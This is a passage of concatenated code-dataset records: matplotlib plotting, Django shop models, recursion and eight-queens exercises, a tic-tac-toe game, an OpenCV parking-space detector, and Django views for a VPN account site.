validity\r\nfig, axs = plt.subplots(nrows=3, ncols=2, sharey=True, figsize=(10, 10))\r\n\r\nax = axs[0, 0]\r\nax.scatter(scores_stp['significance'], scores_stp['reg_mean_errors'])\r\nax.plot(scores_stp['significance'], scores_stp['reg_mean_errors'])\r\nax.plot(scores_stp['significance'], scores_stp['significance'], '--', color='k')\r\nax.set_title('Average daily sold parking hours')\r\nax.set_ylabel('Error rate')\r\n\r\nax = axs[0, 1]\r\nax.scatter(scores_dur['significance'], scores_dur['reg_mean_errors'])\r\nax.plot(scores_dur['significance'], scores_dur['reg_mean_errors'])\r\nax.plot(scores_dur['significance'], scores_dur['significance'], '--', color='k')\r\nax.set_title('Average duration of stay')\r\n\r\nax = axs[1, 0]\r\nax.scatter(scores_entry['significance'], scores_entry['reg_mean_errors'])\r\nax.plot(scores_entry['significance'], scores_entry['reg_mean_errors'])\r\nax.plot(scores_entry['significance'], scores_entry['significance'], '--', color='k')\r\nax.set_title('Average time of entry')\r\nax.set_ylabel('Error rate')\r\n\r\nax = axs[1, 1]\r\nax.scatter(scores_occstp['significance'], scores_occstp['reg_mean_errors'])\r\nax.plot(scores_occstp['significance'], scores_occstp['reg_mean_errors'])\r\nax.plot(scores_occstp['significance'], scores_occstp['significance'], '--', color='k')\r\nax.set_title('Average daytime occupancy')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nax = axs[2, 0]\r\nax.scatter(scores_rev.index, scores_rev['reg_mean_errors'])\r\nax.plot(scores_rev.index, scores_rev['reg_mean_errors'])\r\nax.plot(scores_rev.index, scores_rev.index, '--', color='k')\r\nax.set_title('Average daily revenue')\r\nax.set_ylabel('Error rate')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nfig.delaxes(axs[2, 
1])\r\nfig.suptitle('Empirical validity per target')\r\n\r\nplt.show()\r\n","repo_name":"mateuszwiza/mtcp","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":14194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21437825111","text":"import uuid\n\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom common.models import UpdatedAndCreated\nfrom common.utils import unique_sku_generator\n\n\nclass DeliveryOptions(UpdatedAndCreated):\n ACTIVE = (\n (True, \"Active\"),\n (False, \"Not Active\"),\n )\n sku = models.IntegerField(\n null=False, blank=True, unique=True, editable=False\n )\n option = models.CharField(max_length=255, null=False, blank=False)\n price = models.DecimalField(\n max_digits=10, decimal_places=2, null=False, default=0\n )\n description = models.CharField(max_length=400, null=False, blank=False)\n active = models.BooleanField(default=False, choices=ACTIVE)\n\n class Meta:\n verbose_name_plural = \"Delivery Options\"\n\n def save(self, *args, **kwargs):\n \"\"\"\n Override the original save method to set a unique sku\n for the delivery option.\n \"\"\"\n if not self.sku:\n self.sku = unique_sku_generator(self, 6)\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.option\n\n\nclass DiscountCode(models.Model):\n ACTIVE = (\n (True, \"Active\"),\n (False, \"Not Active\"),\n )\n TRUE_FALSE = (\n (True, \"True\"),\n (False, \"False\"),\n )\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n sku = models.IntegerField(\n null=False, blank=True, unique=True, editable=False\n )\n code = models.CharField(max_length=50, blank=False, unique=True)\n discount = models.PositiveIntegerField(\n blank=False,\n null=False,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n )\n active = models.BooleanField(default=False, choices=ACTIVE)\n set_expiry = models.BooleanField(default=False, choices=TRUE_FALSE)\n set_quantity = models.BooleanField(default=False, choices=TRUE_FALSE)\n expiry = models.DateField(null=True, blank=True)\n quantity = models.PositiveIntegerField(\n blank=True, null=True, validators=[MinValueValidator(0)]\n )\n created = models.DateTimeField(auto_now_add=True)\n created_by = models.CharField(max_length=100, blank=True)\n\n def save(self, *args, **kwargs):\n \"\"\"\n Override the original save method to set a unique sku\n for the discount code.\n \"\"\"\n if not self.sku:\n self.sku = unique_sku_generator(self, 6)\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.code\n","repo_name":"Tmuat/handmade-by-ellie","sub_path":"bag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16340175580","text":"sentence = input(\"Type text\") #type sentecne\r\nListofStrings = sentence.split() #space\r\n\r\ncaps = []\r\nfor word in ListofStrings:\r\n word = str(word).lower()\r\n caps.append(word)\r\n# .sort this function will put it alphabetical order\r\ncaps = list(set(caps))\r\ncaps.sort()\r\n#printing the sentence and words\r\nprint(\"sentence:\", sentence)\r\nprint(\"Each word is\", f\"{caps}\")\r\nprint(\"Number of words in the sentence = \", f\"{len(caps)}\")","repo_name":"Joseuri17/CS50-Python","sub_path":"Python 
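Both models in the bag/models.py record above defer sku creation to unique_sku_generator from common.utils; that helper is not included in the record, so the following is only a hypothetical guess at its shape:

import random

def unique_sku_generator(instance, digits):
    # Hypothetical stand-in: draw random fixed-width integers until one is unused.
    model = type(instance)
    while True:
        candidate = random.randint(10 ** (digits - 1), 10 ** digits - 1)
        if not model.objects.filter(sku=candidate).exists():
            return candidate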
Programming/Duplicates/removeDuplicateWords.py","file_name":"removeDuplicateWords.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20094075867","text":"import unittest\r\nimport doctest\r\nfrom typing import Any\r\nfrom chap04_test import Stack\r\n\r\n# %% [markdown]\r\n# # 再帰的アルゴリズム\r\n# %%\r\n\r\n# %% [markdown]\r\n# ## 再帰の基本\r\n\r\n\r\nclass TestFactorial(unittest.TestCase):\r\n def test_3の階乗は6であること(self):\r\n self.assertEqual(factorial(3), 6)\r\n\r\n\r\ndef factorial(n: int) -> int:\r\n \"\"\"\r\n 非負の整数の階乗値を求める\r\n >>> factorial(3)\r\n 6\r\n \"\"\"\r\n if n > 0:\r\n return n * factorial(n - 1)\r\n else:\r\n return 1\r\n\r\n\r\nclass TestGcd(unittest.TestCase):\r\n def test_22と8の最大公約数は2であること(self):\r\n self.assertEqual(gcd(22, 8), 2)\r\n\r\n\r\ndef gcd(x: int, y: int) -> int:\r\n \"\"\"\r\n ユークリッドの互除法を用いて、xとyの最大公約数を求める。\r\n >>> gcd(22, 8)\r\n 2\r\n \"\"\"\r\n if y == 0:\r\n return x\r\n else:\r\n return gcd(y, x % y)\r\n\r\n\r\nclass TestRecur(unittest.TestCase):\r\n def test_実行結果を配列で返すこと(self):\r\n self.assertEqual(recur(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n def test_末尾再帰を除去した実行結果を配列で返すこと(self):\r\n self.assertEqual(recur2(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n def test_スタックを用いて末尾再帰を除去した実行結果を配列で返すこと(self):\r\n self.assertEqual(recur3(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n\r\ndef recur(n: int, result: list) -> list:\r\n \"\"\"真に再帰的な関数\r\n\r\n >>> recur(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n if n > 0:\r\n recur(n - 1, result)\r\n result.append(n)\r\n recur(n - 2, result)\r\n\r\n return result\r\n\r\ndef recur2(n: int, result: list) -> list:\r\n \"\"\"末尾再帰を除去した関数\r\n\r\n >>> recur2(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n while n > 0:\r\n recur(n - 1, result)\r\n result.append(n)\r\n n = n - 2\r\n\r\n return result\r\n\r\ndef recur3(n: int, result: list) -> list:\r\n \"\"\"スタックを用いて末尾再帰を除去した関数\r\n\r\n >>> recur3(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n s = Stack(n)\r\n\r\n while True:\r\n if n > 0:\r\n s.push(n)\r\n n = n - 1\r\n continue\r\n if not s.is_empty():\r\n n = s.pop()\r\n result.append(n)\r\n n = n - 2\r\n continue\r\n break\r\n\r\n return result\r\n\r\n# %% [markdown]\r\n# ## ハノイの塔\r\n\r\n\r\nclass TestMove(unittest.TestCase):\r\n def test_円盤3枚(self):\r\n excepted = [\r\n '円盤[1]を1軸から3軸へ移動',\r\n '円盤[2]を1軸から2軸へ移動',\r\n '円盤[1]を3軸から2軸へ移動',\r\n '円盤[3]を1軸から3軸へ移動',\r\n '円盤[1]を2軸から1軸へ移動',\r\n '円盤[2]を2軸から3軸へ移動',\r\n '円盤[1]を1軸から3軸へ移動'\r\n ]\r\n actual = move(3, 1, 3, [])\r\n self.assertEquals(actual, excepted)\r\n\r\n\r\ndef move(no: int, x: int, y: int, result: list) -> list:\r\n \"\"\"no枚の円盤x軸からy軸へ移動\r\n >>> move(3, 1, 3, [])\r\n ['円盤[1]を1軸から3軸へ移動', '円盤[2]を1軸から2軸へ移動', '円盤[1]を3軸から2軸へ移動', '円盤[3]を1軸から3軸へ移動', '円盤[1]を2軸から1軸へ移動', '円盤[2]を2軸から3軸へ移動', '円盤[1]を1軸から3軸へ移動']\r\n \"\"\"\r\n if no > 1:\r\n move(no - 1, x, 6 - x - y, result)\r\n\r\n result.append(f'円盤[{no}]を{x}軸から{y}軸へ移動')\r\n\r\n if no > 1:\r\n move(no - 1, 6 - x - y, y, result)\r\n\r\n return result\r\n\r\n\r\n# %% [markdown]\r\n# ## 8王妃問題\r\n\r\nclass TestEightQueen(unittest.TestCase):\r\n def test_各列に1個の王妃を配置する組み合わせを再帰的に列挙(self):\r\n eight_queen = EightQueen()\r\n eight_queen.set(0)\r\n self.assertEqual(len(eight_queen.result), 16777216)\r\n\r\n def test_各列に1個の王妃を配置する組み合わせを再帰的に列挙2(self):\r\n eight_queen = EightQueen2()\r\n eight_queen.set(0)\r\n self.assertEqual(len(eight_queen.result), 40320)\r\n\r\n def test_8王妃問題を解くプログラム(self):\r\n eight_queen = EightQueen3()\r\n eight_queen.set(0)\r\n 
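The move() routine in the chap05 record above emits one line per move and satisfies T(n) = 2*T(n-1) + 1, i.e. 2**n - 1 moves for n disks; a quick check (illustrative):

def hanoi_move_count(n):
    # Closed form of T(n) = 2*T(n-1) + 1 with T(0) = 0.
    return 2 ** n - 1

assert len(move(3, 1, 3, [])) == hanoi_move_count(3)  # the 7 moves listed in the doctest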
self.assertEqual(len(eight_queen.result), 92)\r\n\r\n\r\nclass EightQueen:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n\r\n def set(self, i:int) -> None:\r\n \"\"\"i列目に王妃を配置\"\"\"\r\n for j in range(8):\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n else:\r\n self.set(i + 1)\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n\r\nclass EightQueen2:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n self.__flag = [False] * 8\r\n\r\n def set(self, i: int) -> None:\r\n \"\"\"i列目の適切な位置に王妃を配置\"\"\"\r\n for j in range(8):\r\n if not self.__flag[j]:\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n else:\r\n self.__flag[j] = True\r\n self.set(i + 1)\r\n self.__flag[j] = False\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n\r\nclass EightQueen3:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n self.__flag_a = [False] * 8\r\n self.__flag_b = [False] * 15\r\n self.__flag_c = [False] * 15\r\n\r\n def set(self, i: int) -> None:\r\n \"\"\"i列目の適切な位置に王妃を配置\"\"\"\r\n for j in range(8):\r\n if (not self.__flag_a[j]\r\n and not self.__flag_b[i + j]\r\n and not self.__flag_c[i - j + 7]):\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n self.put2()\r\n else:\r\n self.__flag_a[j] = self.__flag_b[i +\r\n j] = self.__flag_c[i - j + 7] = True\r\n self.set(i + 1)\r\n self.__flag_a[j] = self.__flag_b[i +\r\n j] = self.__flag_c[i - j + 7] = False\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n def put2(self) -> None:\r\n \"\"\"盤面を□と■で出力\"\"\"\r\n for j in range(8):\r\n for i in range(8):\r\n print('■' if self.__pos[i] == j else '□', end='')\r\n print()\r\n print()\r\n\r\n\r\n\r\ndoctest.testmod(verbose=True)\r\nunittest.main(argv=[''], verbosity=2, exit=False)\r\n","repo_name":"k2works/python-drill","sub_path":"src/chap05.py","file_name":"chap05.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15231951923","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n# ------------------------------------------------------------------------------------------------------------\n\n# In[25]:\nboard=[\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]\ntest_board=[\"X\",\"O\",\"X\",\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"]\n\n\n# In[26]:\n\n\nfrom IPython.display import clear_output\ndef displaying_the_board(board):\n print(board[0] + \" | \" +board[1]+ \" | \" +board[2])\n print(\"------------------\")\n print(board[3] + \" | \" +board[4]+ \" | \"+board[5])\n print(\"------------------\")\n print(board[6] + \" | \" +board[7]+ \" | \"+board[8])\n \n\n\n# In[27]:\n\n\ndisplaying_the_board(board)\n\ndisplaying_the_board(test_board)\n\n\n# In[28]:\n\n\ndef player_input():\n marker=\"\"\n #Ask player to choose X or O\n while marker!=\"X\" and marker!=\"O\":\n marker=input(\"Player 1 , Choose X or O: \").upper()\n if marker==\"X\":\n player1=\"X\"\n player2=\"O\"\n else:\n player1=\"O\"\n player2=\"X\"\n print(f'Player 1 is {player1} and Player 2 is {player2}')\n return player1,player2\n\n \n \n\n\n# In[29]:\n\n\nplayer_input()\n\n\n# In[32]:\n\n\ndef 
place_marker(board,position,marker):\n board[position]=marker\n\n\n# In[33]:\n\n\nplace_marker(test_board,0,\"X\")\ndisplaying_the_board(test_board)\n\n\n# In[34]:\n\n\ndef win_check(board,mark):\n return (board[0]==board[1]==board[2]==mark or board[3]==board[4]==board[5]==mark or board[6]==board[7]==board[8]==mark or \n board[0]==board[3]==board[6]==mark or board[1]==board[4]==board[7]==mark or board[2]==board[5]==board[8]==mark or\n board[0]==board[4]==board[8]==mark or board[2]==board[4]==board[6]==mark)\n \n \n\n\n# In[35]:\n\n\ndisplaying_the_board(test_board)\nwin_check(test_board,\"X\")\n\n\n# In[36]:\n\n\nimport random\ndef choose_first():\n rand=random.randint(0,1)\n if rand==0:\n return 'Player 2'\n else:\n return 'Player 1'\n\n\n# In[37]:\n\n\nchoose_first()\n\n\n# In[38]:\n\n\ndef space_check(board,position):\n return board[position]==\" \"\n\n\n# In[39]:\n\n\ndef full_board_check(board):\n # only positions 0-8 are playable\n for i in range(0,9):\n if space_check(board,i):\n return False\n return True\n\n\n# In[40]:\n\n\nfull_board_check(board)\n\n\n# In[41]:\n\n\ndef player_choice(board):\n position=10\n while position not in range(0,9) or not space_check(board,position):\n position= int(input(\"Choose a position between 0 and 8 : \"))\n return position\n\n\n# In[44]:\n\n\nplayer_choice(board)\n\n\n# In[46]:\n\n\ndef play_again():\n choice=input(\"Do you want to play again? Yes or No ?\")\n return choice.lower()==\"yes\"\n \n\n\n# In[47]:\n\n\nplay_again()\n\n\n# In[ ]:\n\n\nprint(\"TIC-TAC-TOE\")\nwhile True:\n board=[\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]\n player1_marker, player2_marker = player_input()\n turn=choose_first()\n print(f'{turn} goes first')\n play_game = input('Are you ready to play? Enter Y or N.')\n if play_game.lower()==\"y\":\n game_on=True\n else:\n game_on=False\n while game_on:\n if turn == 'Player 1':\n # Player1's turn.\n \n displaying_the_board(board)\n position = player_choice(board)\n \n place_marker(board,position,player1_marker)\n\n if win_check(board,player1_marker):\n displaying_the_board(board)\n print('Congratulations! 
You have won the game!')\n game_on = False\n else:\n if full_board_check(board):\n displaying_the_board(board)\n print('The game is a draw!')\n break\n else:\n turn = 'Player 2'\n\n else:\n # Player2's turn.\n \n displaying_the_board(board)\n position = player_choice(board)\n place_marker(board,position,player2_marker)\n\n if win_check(board,player2_marker):\n displaying_the_board(board)\n print('Player 2 has won!')\n game_on = False\n else:\n if full_board_check(board):\n displaying_the_board(board)\n print('The game is a draw!')\n break\n else:\n turn = 'Player 1'\n\n if not play_again():\n break\n\n \n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"navya09jain/Tic-Tac-Toe","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"407988750","text":"import cv2\nimport numpy as np\n\n\nimg = cv2.imread('3.jpg')\n\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\nblur = cv2.GaussianBlur(gray, (5, 5), 0)\n\nedges = cv2.Canny(blur, 50, 150)\n\n\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\nclosed = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)\n\n\ncontours, hierarchy = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n\nparking_spaces = 0\nfor contour in contours:\n \n area = cv2.contourArea(contour)\n if area > 1000 and area < 10000:\n \n perimeter = cv2.arcLength(contour, True)\n \n approx = cv2.approxPolyDP(contour, 0.02 * perimeter, True)\n \n corners = len(approx)\n if corners == 4:\n \n x, y, w, h = cv2.boundingRect(contour)\n aspect_ratio = float(w) / h\n if aspect_ratio > 0.5 and aspect_ratio < 2:\n \n parking_spaces += 1\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n\ncv2.imshow('result', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"plaree/project-junks","sub_path":"deneme_img2.py","file_name":"deneme_img2.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74938412384","text":"import requests\nimport io\nimport zipfile\nimport hmac\nimport base64\nfrom hashlib import sha256\nfrom urllib.parse import urlencode, parse_qsl\nfrom datetime import timedelta, datetime\n\nfrom django.http import (\n HttpResponse, JsonResponse,\n HttpResponseRedirect,\n HttpResponseNotFound, HttpResponseForbidden\n)\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.admin.sites import site\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext as _\nfrom django.utils import timezone\nfrom django.conf import settings as project_settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Count\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django_countries import countries\nfrom constance import config as site_config\nimport lcoreapi\n\nfrom ccvpn.common import get_client_ip, get_price_float\nfrom payments.models import ACTIVE_BACKENDS\nfrom .forms import SignupForm, ReqEmailForm\nfrom .models import GiftCode, VPNUser\nfrom .core import core_api\nfrom . import core\nfrom . import graphs\nfrom . 
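The OpenCV record above keeps contours that are mid-sized, four-cornered, and roughly box-shaped; the same filter factored into a reusable predicate (a sketch reusing the record's thresholds, not code from that repo):

import cv2

def looks_like_parking_space(contour, min_area=1000, max_area=10000):
    # Mid-sized area, quadrilateral approximation, aspect ratio between 0.5 and 2.
    area = cv2.contourArea(contour)
    if not (min_area < area < max_area):
        return False
    approx = cv2.approxPolyDP(contour, 0.02 * cv2.arcLength(contour, True), True)
    if len(approx) != 4:
        return False
    x, y, w, h = cv2.boundingRect(contour)
    return 0.5 < w / float(h) < 2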
import openvpn\n\n\ndef get_locations():\n \"\"\" Pretty bad thing that returns get_locations() with translated stuff\n that depends on the request\n \"\"\"\n countries_d = dict(countries)\n locations = core.get_locations()\n for k, v in locations:\n cc = v['country_code'].upper()\n v['country_name'] = countries_d.get(cc, cc)\n return locations\n\n\ndef ca_crt(request):\n return HttpResponse(content=project_settings.OPENVPN_CA,\n content_type='application/x-x509-ca-cert')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('index')\n\n\ndef signup(request):\n if request.user.is_authenticated():\n return redirect('account:index')\n\n if request.method != 'POST':\n form = SignupForm()\n return render(request, 'ccvpn/signup.html', dict(form=form))\n\n form = SignupForm(request.POST)\n\n if not form.is_valid():\n return render(request, 'ccvpn/signup.html', dict(form=form))\n\n user = User.objects.create_user(form.cleaned_data['username'],\n form.cleaned_data['email'],\n form.cleaned_data['password'])\n user.save()\n\n if core.VPN_AUTH_STORAGE == 'core':\n core.create_user(form.cleaned_data['username'], form.cleaned_data['password'])\n\n try:\n user.vpnuser.referrer = User.objects.get(id=request.session.get('referrer'))\n except User.DoesNotExist:\n pass\n\n user.vpnuser.campaign = request.session.get('campaign')\n\n user.vpnuser.save()\n\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n auth.login(request, user)\n\n return redirect('account:index')\n\n\n@login_required\ndef discourse_login(request):\n sso_secret = project_settings.DISCOURSE_SECRET\n discourse_url = project_settings.DISCOURSE_URL\n\n if project_settings.DISCOURSE_SSO is not True:\n return HttpResponseNotFound()\n\n payload = request.GET.get('sso', '')\n signature = request.GET.get('sig', '')\n\n expected_signature = hmac.new(sso_secret.encode('utf-8'),\n payload.encode('utf-8'),\n sha256).hexdigest()\n\n if signature != expected_signature:\n return HttpResponseNotFound()\n\n if request.method == 'POST' and 'email' in request.POST:\n form = ReqEmailForm(request.POST)\n if not form.is_valid():\n return render(request, 'ccvpn/require_email.html', dict(form=form))\n\n request.user.email = form.cleaned_data['email']\n request.user.save()\n\n if not request.user.email:\n form = ReqEmailForm()\n return render(request, 'ccvpn/require_email.html', dict(form=form))\n\n try:\n payload = base64.b64decode(payload).decode('utf-8')\n payload_data = dict(parse_qsl(payload))\n except (TypeError, ValueError):\n return HttpResponseNotFound()\n\n payload_data.update({\n 'external_id': request.user.id,\n 'username': request.user.username,\n 'email': request.user.email,\n 'require_activation': 'true',\n })\n\n payload = urlencode(payload_data)\n payload = base64.b64encode(payload.encode('utf-8'))\n signature = hmac.new(sso_secret.encode('utf-8'), payload, sha256).hexdigest()\n redirect_query = urlencode(dict(sso=payload, sig=signature))\n redirect_path = '/session/sso_login?' + redirect_query\n\n return HttpResponseRedirect(discourse_url + redirect_path)\n\n\n@login_required\ndef index(request):\n ref_url = project_settings.ROOT_URL + '?ref=' + str(request.user.id)\n\n twitter_url = 'https://twitter.com/intent/tweet?'\n twitter_args = {\n 'text': _(\"Awesome VPN! 
3€ per month, with a free 7 days trial!\"),\n 'via': 'CCrypto_VPN',\n 'url': ref_url,\n 'related': 'CCrypto_VPN,CCrypto_org'\n }\n\n class price_fn:\n \"\"\" Clever hack to get the price in templates with {{price.3}} with\n 3 an arbitrary number of months\n \"\"\"\n def __getitem__(self, months):\n n = int(months) * get_price_float()\n c = project_settings.PAYMENTS_CURRENCY[1]\n return '%.2f %s' % (n, c)\n\n context = dict(\n title=_(\"Account\"),\n ref_url=ref_url,\n twitter_link=twitter_url + urlencode(twitter_args),\n subscription=request.user.vpnuser.get_subscription(include_unconfirmed=True),\n backends=sorted(ACTIVE_BACKENDS.values(), key=lambda x: x.backend_id),\n subscr_backends=sorted((b for b in ACTIVE_BACKENDS.values()\n if b.backend_has_recurring),\n key=lambda x: x.backend_id),\n default_backend='paypal',\n recaptcha_site_key=project_settings.RECAPTCHA_SITE_KEY,\n price=price_fn(),\n user_motd=site_config.MOTD_USER,\n )\n return render(request, 'lambdainst/account.html', context)\n\n\ndef captcha_test(grr, request):\n api_url = project_settings.RECAPTCHA_API\n\n if api_url == 'TEST' and grr == 'TEST-TOKEN':\n # FIXME: i'm sorry.\n return True\n\n data = dict(secret=project_settings.RECAPTCHA_SECRET_KEY,\n remoteip=get_client_ip(request),\n response=grr)\n\n try:\n r = requests.post(api_url, data=data)\n r.raise_for_status()\n d = r.json()\n return d.get('success')\n except (requests.ConnectionError, requests.HTTPError, ValueError):\n return False\n\n\n@login_required\ndef trial(request):\n if request.method != 'POST' or not request.user.vpnuser.can_have_trial:\n return redirect('account:index')\n\n grr = request.POST.get('g-recaptcha-response', '')\n if captcha_test(grr, request):\n request.user.vpnuser.give_trial_period()\n request.user.vpnuser.save()\n messages.success(request, _(\"OK!\"))\n else:\n messages.error(request, _(\"Invalid captcha\"))\n\n return redirect('account:index')\n\n\n@login_required\ndef settings(request):\n if request.method != 'POST':\n return render(request, 'lambdainst/settings.html')\n\n pw = request.POST.get('password')\n pw2 = request.POST.get('password2')\n if pw and pw2:\n if pw != pw2:\n messages.error(request, _(\"Passwords do not match\"))\n else:\n request.user.set_password(pw)\n\n if core.VPN_AUTH_STORAGE == 'core':\n core.update_user_password(request.user, pw)\n\n messages.success(request, _(\"OK!\"))\n\n email = request.POST.get('email')\n if email:\n request.user.email = email\n else:\n request.user.email = ''\n\n request.user.save()\n\n return render(request, 'lambdainst/settings.html', dict(title=_(\"Settings\")))\n\n\n@login_required\ndef gift_code(request):\n try:\n code = GiftCode.objects.get(code=request.POST.get('code', '').strip(), available=True)\n except GiftCode.DoesNotExist:\n code = None\n\n if code is None:\n messages.error(request, _(\"Gift code not found or already used.\"))\n elif not code.use_on(request.user):\n messages.error(request, _(\"Gift code only available to free accounts.\"))\n else:\n messages.success(request, _(\"OK!\"))\n\n return redirect('account:index')\n\n\n@login_required\ndef logs(request):\n page_size = 20\n page = int(request.GET.get('page', 0))\n offset = page * page_size\n\n base = core_api.info['current_instance']\n path = '/users/' + request.user.username + '/sessions/'\n try:\n l = core_api.get(base + path, offset=offset, limit=page_size)\n total_count = l['total_count']\n items = l['items']\n except lcoreapi.APINotFoundError:\n total_count = 0\n items = []\n return render(request, 
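The price_fn trick above works because Django templates resolve {{ price.3 }} as an item lookup with the string key '3'; a stripped-down sketch of the same idea (illustrative):

class PriceLookup:
    def __init__(self, monthly, currency):
        self.monthly = monthly
        self.currency = currency

    def __getitem__(self, months):
        # Template variable lookups pass string keys, so coerce to int first.
        return '%.2f %s' % (int(months) * self.monthly, self.currency)

price = PriceLookup(3.0, 'EUR')
price['3']  # '9.00 EUR', which is what {{ price.3 }} renders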
'lambdainst/logs.html', {\n 'sessions': items,\n 'page': page,\n 'prev': page - 1 if page > 0 else None,\n 'next': page + 1 if offset + page_size < total_count else None,\n 'last_page': total_count // page_size,\n 'title': _(\"Logs\"),\n })\n\n\n@login_required\ndef config(request):\n return render(request, 'lambdainst/config.html', dict(\n title=_(\"Config\"),\n config_os=openvpn.CONFIG_OS,\n config_countries=(c for _, c in get_locations()),\n config_protocols=openvpn.PROTOCOLS,\n ))\n\n\n@login_required\ndef config_dl(request):\n allowed_cc = [cc for (cc, _) in get_locations()]\n\n os = request.GET.get('client_os')\n\n common_options = {\n 'username': request.user.username,\n 'protocol': request.GET.get('protocol'),\n 'os': os,\n 'http_proxy': request.GET.get('http_proxy'),\n 'ipv6': 'enable_ipv6' in request.GET,\n }\n\n # Should be validated since it's used in the filename\n # other common options are only put in the config file\n protocol = common_options['protocol']\n if protocol not in ('udp', 'udpl', 'tcp'):\n return HttpResponseNotFound()\n\n location = request.GET.get('gateway')\n\n if location == 'all':\n # Multiple gateways in a zip archive\n\n f = io.BytesIO()\n z = zipfile.ZipFile(f, mode='w')\n\n for gw_name in allowed_cc + ['random']:\n if os == 'chromeos':\n filename = 'ccrypto-%s-%s.onc' % (gw_name, protocol)\n else:\n filename = 'ccrypto-%s-%s.ovpn' % (gw_name, protocol)\n config = openvpn.make_config(gw_name=gw_name, **common_options)\n z.writestr(filename, config.encode('utf-8'))\n\n z.close()\n\n r = HttpResponse(content=f.getvalue(), content_type='application/zip')\n r['Content-Disposition'] = 'attachment; filename=\"%s.zip\"' % filename\n return r\n else:\n # Single gateway\n if location[3:] in allowed_cc:\n gw_name = location[3:]\n else:\n gw_name = 'random'\n if os == 'chromeos':\n filename = 'ccrypto-%s-%s.onc' % (gw_name, protocol)\n else:\n filename = 'ccrypto-%s-%s.ovpn' % (gw_name, protocol)\n\n config = openvpn.make_config(gw_name=gw_name, **common_options)\n\n if 'plain' in request.GET:\n return HttpResponse(content=config, content_type='text/plain')\n else:\n if os == 'chromeos':\n r = HttpResponse(content=config, content_type='application/x-onc')\n else:\n r = HttpResponse(content=config, content_type='application/x-openvpn-profile')\n r['Content-Disposition'] = 'attachment; filename=\"%s\"' % filename\n return r\n\n\n@csrf_exempt\ndef api_auth(request):\n if request.method != 'POST':\n return HttpResponseNotFound()\n\n if core.VPN_AUTH_STORAGE != 'inst':\n return HttpResponseNotFound()\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n secret = request.POST.get('secret')\n\n if secret != core.LCORE_INST_SECRET:\n return HttpResponseForbidden(content=\"Invalid secret\")\n\n user = authenticate(username=username, password=password)\n if not user or not user.is_active:\n return JsonResponse(dict(status='fail', message=\"Invalid credentials\"))\n\n if not user.vpnuser.is_paid:\n return JsonResponse(dict(status='fail', message=\"Not allowed to connect\"))\n\n user.vpnuser.last_vpn_auth = timezone.now()\n user.vpnuser.save()\n\n return 